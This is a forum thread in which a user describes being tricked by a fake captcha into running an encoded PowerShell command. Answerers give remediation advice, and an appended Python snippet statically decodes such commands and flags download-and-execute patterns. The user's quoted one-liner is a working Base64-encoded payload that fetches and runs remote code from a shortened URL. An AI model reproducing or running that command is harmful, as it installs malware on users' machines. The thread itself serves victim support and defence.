I was browsing the internet and clicked on some links from a Google search. One of those links opened what looked like a Cloudflare captcha, which then prompted me to press Windows + R and copy some text that was automatically added to my clipboard. Exhausted and a bit naive, I followed the instructions and ran a PowerShell script:
`powershell -ep bypass -enc KABJAG4AdgBvAGsAZQAtAHcAZQBiAHIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJwBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcgB0AGUAcgAuAG0AZQAvAFgATwBXAHkAVAAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AYwBvAG4AdABlAG4AdAAgAHwAaQBlAHgA -w 1`
This installed a program called Crysta_X64.exe. I've since deleted that program and run Malwarebytes, but I still feel uneasy. What should I do next? Any advice?
3 Answers
If you think malware might be on your PC, consider reinstalling Windows using a USB stick. After that, change all your passwords and make sure to enable two-factor authentication (2FA) wherever possible. And seriously, think twice before running any scripts found online in the future!
You definitely made a mistake by running that script. If a site prompts you to open the Run dialog or any command line, stop immediately! Those sites are usually trying to install viruses or steal your info. It's good you realized it now, but be very cautious moving forward.
You basically told your system to download and execute a program with zero confirmation. That's a big no-no. The PowerShell command you ran bypassed security measures and ran a base64 encoded command silently. You should definitely reinstall Windows, change all your passwords, and never run unknown scripts again!
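To make the last answer's description concrete, here is an added example (not part of the question or of any answer) that statically decodes a `powershell ... -enc` command line and reports the execution-policy bypass, the hidden window and the download-and-execute pattern, without running anything. The names `triage` and `is_switch` are hypothetical, and the sample command is constructed with a placeholder URL rather than taken from the question.

```python
import base64
import re
import shlex

DOWNLOAD = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def is_switch(token, full, alias=None, min_len=1):
    """True if token is a prefix abbreviation (or the alias) of a powershell.exe switch."""
    if not token.startswith("-"):
        return False
    name = token[1:].lower()
    return name == alias or (len(name) >= min_len and full.startswith(name))

def triage(command_line):
    """Decode a powershell.exe command line without executing any of it."""
    tokens = shlex.split(command_line, posix=False)
    report = {"policy_bypass": False, "hidden_window": False, "decoded": None,
              "download_and_execute": False, "urls": []}
    for tok, nxt in zip(tokens, tokens[1:]):
        value = nxt.strip("'\"").lower()
        if is_switch(tok, "executionpolicy", alias="ep", min_len=2):
            report["policy_bypass"] = value == "bypass"
        elif is_switch(tok, "windowstyle"):
            report["hidden_window"] = value in ("hidden", "1")  # 1 is the numeric value of Hidden
        elif is_switch(tok, "encodedcommand", alias="ec"):
            try:  # -EncodedCommand carries Base64 over UTF-16LE text
                raw = base64.b64decode(nxt.strip("'\""), validate=True)
                report["decoded"] = raw.decode("utf-16-le")
            except ValueError:  # bad Base64 or not UTF-16LE: leave decoded as None
                pass
    script = report["decoded"] or ""
    report["download_and_execute"] = bool(DOWNLOAD.search(script) and EXECUTE.search(script))
    report["urls"] = URL.findall(script)
    return report

# Constructed sample: same switches as the question, placeholder URL.
SAMPLE_SCRIPT = "(Invoke-WebRequest -Uri 'https://example.invalid/stage' -UseBasicParsing).Content | iex"
SAMPLE_COMMAND = ("powershell -ep bypass -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
                  + " -w 1")

if __name__ == "__main__":
    for key, val in triage(SAMPLE_COMMAND).items():
        print(f"{key}: {val}")
```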